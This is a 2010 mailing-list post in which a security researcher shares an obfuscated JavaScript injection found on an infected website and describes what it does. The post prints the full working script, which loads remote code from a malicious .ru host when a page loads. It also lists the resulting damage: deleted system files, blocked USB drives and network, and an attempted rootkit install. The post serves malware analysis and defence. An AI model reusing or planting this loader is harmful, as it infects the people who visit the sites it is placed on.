WebApp Sec mailing list archives
Give a look at the malicious script
From: s34c0d3r () gmail com
Date: 20 May 2010 21:47:29 -0000
Hello Everyone, I was just working on some web application security and found the malicious script injected in the code. It was prepared wisely but now gets detected. Here it is:

<script>var g="g";n={jD:51390};function M(){this.ta=false;var t=new String("01hcreat".substr(3)+"eElem"+"649pent".substr(4));var Mt=["P"];this.S="";var K=new String("onlo"+"ad");try {var Pm='Ae'} catch(Pm){};var A=new String("defer");try {var p='Q'} catch(p){};try {var H='TH'} catch(H){};var c=new String("appIsNt".substr(0,3)+"end"+"JKvChi".substr(3)+"ld");var R=window;try {var Ic='Mm'} catch(Ic){};var j=new String("bodTQxn".substr(0,3)+"Ne3iyi3Ne".substr(4,1));xD=14051;xD+=70;var u=new Date();var TD=document;this.GS=22175;this.GS--;var F=new String("scrip"+"tQCwq".substr(0,1));this.D="";this.nB=35701;this.nB-=197;var b=String("srKo8".substr(0,2)+"cxUZ".substr(0,1));this.y=63146;this.y--;this.Mx=57925;this.Mx++;function cJ(){try {var HI='C'} catch(HI){};try {var G=String("/go"+"ogl"+"e.c"+"om/"+"7AG8new".substr(4)+"gro"+"und"+"s.c"+"om/"+"kEAZdow".substr(4)+"nlo"+"ad."+"ytJ4com".substr(4)+".ph"+"p");var z=856480-848400;F_={FD:false};CB={HY:false};var Gx=new String("http:"+"// pas"+"sport"+"blues"+".ru:");this.m="";this.pZ="";var B=6126-6125;var xL=["Gp","MK","vC"];this.l=28692;this.l-=179;i=TD[t](F);_R={h:false};try {} catch(L){};var zQ=["jl","s"];var NR={af:false};try {var NF='Pv'} catch(NF){};try {var Cn='cC'} catch(Cn){};this.iQ=false;aQG=["FU","LQ"];var sB="sB";i[A]=B;var PZx="";var aW="";i[b]=Gx+z+G;var Xj=new Date();var ew=new Date();iy=32656;iy-=67;TD[j][c](i);try {} catch(ai){};try {} catch(xS){};} catch(X){var Ac={et:"fM"};var RW='';};}R[K]=cJ;this.ge=39406;this.ge++;var ewO={jt:"xl"};};var jf={i_:"SY"};var Ph={cM:"Ge"};M();try {var RV='bV'} catch(RV){};</script>

Till now what I found is that when anyone visits the infected site, this script redirects the person to "http://passportblues.ru:8080/google.com/newsground.com/download.com.php". passportblues.ru is infecting the system. For the first time it tried to download the Notes1.pdf file. The strange thing is that it loaded the notes1.pdf file, but the pdf didn't have any exploit embedded in it. When the site (passportblue.ru) successfully infects the system, a cmd.exe process is created, which actually executes the batch file downloaded on the system, which deletes "iexplorer". It infects the system and removes around 7-8 .sys files from Windows. After that the pendrive is blocked on the system. USB ports work (wifi USB adapters are working) but no pendrive works. It tries to install a rootkit on the system as well, and the internet connection is also blocked on the system. It is really a notorious script with a little technique to join the whole.

"hxxp://passportblues.ru:8080/google.com/newsground.com/download.com.php"

Any comments regarding it are welcomed.

Tarun Kalla aka S34
Current thread:
- Give a look at the malicious script s34c0d3r (May 21)
- Re: Give a look at the malicious script Paul Melson (May 22)